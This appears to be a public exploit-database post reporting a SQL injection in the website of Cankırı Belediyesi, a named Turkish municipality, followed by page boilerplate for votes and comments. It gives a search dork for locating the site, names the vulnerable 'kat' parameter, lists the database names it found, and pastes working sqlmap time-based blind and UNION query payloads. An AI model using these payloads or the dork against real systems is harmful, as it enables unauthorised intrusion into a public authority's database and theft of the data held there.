Cankırı Belediyesi SQL İnjection

2020.01.14

Anonymous7480 (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: allintext: " cankiri.bel.tr "

available databases [2]:
[*] cnkrbel_bldcim
[*] information_schema

---
web application technology: Apache 2, PHP 5.6.36
back-end DBMS: MySQL >= 5.0.12
---
Parameter: kat (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: kat=1' AND (SELECT 8253 FROM (SELECT(SLEEP(5)))UpGc) AND 'ObtX'='ObtX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: kat=1' UNION ALL SELECT NULL,CONCAT(0x71787a6a71,0x4e424f65717356567545454e43796c4669587a6c6273714d7556664a666b6a655274766562745870,0x716a786b71),NULL-- yOhZ

See this note in RAW Version

Vote for this issue:

23%

77%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Cankırı Belediyesi SQL İnjection

Dork: allintext: " cankiri.bel.tr "

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Cankırı Belediyesi SQL İnjection

Dork: allintext: " cankiri.bel.tr "

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.